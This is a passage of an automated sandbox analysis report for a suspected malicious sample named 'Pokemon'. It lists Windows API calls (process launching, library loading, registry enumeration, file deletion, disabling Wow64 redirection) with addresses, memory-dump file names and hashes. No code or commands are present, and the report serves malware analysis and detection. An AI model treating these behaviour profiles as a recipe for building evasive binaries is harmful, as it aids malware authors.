                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 6597f645e81bb6e631f98c92c97811019412d24e6cc89dc7273aa8cac7868cf1
                                                                                                                                                                                                                                                                                      • Instruction ID: 3528caac4caa3747e09742e58c063bbcc35fd5d19618bc360f07bff9e1649d9d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6597f645e81bb6e631f98c92c97811019412d24e6cc89dc7273aa8cac7868cf1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 685121316043089BE764AF28C945BBFB7E9AF85314F040A2EFA91D3591DBB0CC09A742
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0011B903
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 0011B998
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011B9C7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                      • String ID: <$@
                                                                                                                                                                                                                                                                                      • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                      • Opcode ID: 9a855dbacd4a4737e9534891712c36fa4143daeb1532a5df6b041407840d5864
                                                                                                                                                                                                                                                                                      • Instruction ID: 1d7d356c38fda790b3a275b325929b21c0de8a8121ae312d0874a4b3456f010a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a855dbacd4a4737e9534891712c36fa4143daeb1532a5df6b041407840d5864
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D713975A00619DFCF14DF64C495ADEBBB4BF08314F0484A9E855AB352CB74ED85CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000F7B6D
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000F7BA3
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000F7BB4
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000F7C36
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                      • Opcode ID: f6f8856f631aec4e8782cb7706e40cd5657dd7931cba3e0d7da419ba86a4b97c
                                                                                                                                                                                                                                                                                      • Instruction ID: 26f15c31ae2a21cfc62a7ad290eef73f107611a2c39b6b762f8ef28d88eb271c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6f8856f631aec4e8782cb7706e40cd5657dd7931cba3e0d7da419ba86a4b97c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA41BFB1604208EFDB15CF24D884AAA7BF9EF44310F1080ADAE099F646D7B1DD44DBE1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001248D1
                                                                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 001248E6
                                                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0012492E
                                                                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00124941
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000F27B3
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000F27C6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 000F27F6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00123A29
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00123A30
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00123A45
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00123A4D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000B508E,?,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002), ref: 000B50FD
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000B5110
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,000B508E,?,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002,00000000), ref: 000B5133
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 000EE785
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000EE797
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000EE7BD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                      • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                      • Opcode ID: ec90aad892e4d7b320a798429a0ebf654978d7be354804c1e5e5e8f5de5432a7
                                                                                                                                                                                                                                                                                      • Instruction ID: a20237cf92b120c4fc1381fdf668b0e2c83968b998900414cdb3ba106553d242
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec90aad892e4d7b320a798429a0ebf654978d7be354804c1e5e5e8f5de5432a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F02B718055D5AFD7715721DC84EAD36646F15741B1405B4FC45F6410DB30CD95C645
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009664A
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0009665C
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009666E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                      • Opcode ID: c37fb789554749c9dae8b9b7541b16df1ebb2195cee7c0133883b9bf18c73e05
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a267ea0892957e7fb3bfbffedf62506f3c8c4ed64abc23fe1968055eb963915
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c37fb789554749c9dae8b9b7541b16df1ebb2195cee7c0133883b9bf18c73e05
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4E0C23660263267D7722725FC0CBAE66A89F82F2AB050219FC00E2600DFA0CC6280E5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096610
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00096622
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096635
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                      • Opcode ID: 3aa1d70569097a3e84c4e9120b4e0ffec55fb75200280531738bc8c5df78863b
                                                                                                                                                                                                                                                                                      • Instruction ID: 9b5a5763910c273d856352b511eac952be92a95b94af04dcc8bac50b74cbe218
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aa1d70569097a3e84c4e9120b4e0ffec55fb75200280531738bc8c5df78863b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8D05B35612531B786722B25FC18DCF6B549FD5F513050015FC00A6614DF61CD72D5D9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001035C4
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00103646
                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0010365C
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010366D
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010367F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c2bab5e1588ca37d0caabfa7284f5c7519867e847ca9b24db8ca43caa7c572ea
                                                                                                                                                                                                                                                                                      • Instruction ID: b7718ab771097644b06714333d596959a34459a405f925841570aefcc40c20d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2bab5e1588ca37d0caabfa7284f5c7519867e847ca9b24db8ca43caa7c572ea
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55B15C72A00119BBDF15DBA4CC85EDEBBBDEF48314F0040A6F619E7192EB719B458B60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0011AE87
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0011AE95
                                                                                                                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0011AEC8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0011B09D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C505
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011C560
                                                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0011C5C3
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 0011C606
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011C613
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000FD7CD,?), ref: 000FE714
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000FD7CD,?), ref: 000FE72D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FEAB0: GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000FED8A
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000FEDC3
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FEF02
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FEF1A
                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 000FEF67
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000F9534
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 000F95A5
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 000F9604
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000F9677
                                                                                                                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000F96A2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001095F3
                                                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0010961F
                                                                                                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00109677
                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0010969C
                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001096A4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6905a5fee37f12909ee6fcbbe49cb0ebfbfe213ea6dd552d08bac4bc5d5094ae
                                                                                                                                                                                                                                                                                      • Instruction ID: 86d3b8178f05d8a648bdd0be8756456f49692de1e78c12b92bd69df5aa067313
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6905a5fee37f12909ee6fcbbe49cb0ebfbfe213ea6dd552d08bac4bc5d5094ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D512835A00215EFCF15DF65C891AAABBF5FF49314F088058E849AB3A2CB75ED41DB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0011999D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00119A2D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00119A49
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00119A8F
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00119AAF
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00101A02,?,7529E610), ref: 000AF9F1
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000F0354,00000000,00000000,?,?,00101A02,?,7529E610,?,000F0354), ref: 000AFA18
                                                                                                                                                                                                                                                                                      Memory Dump Source
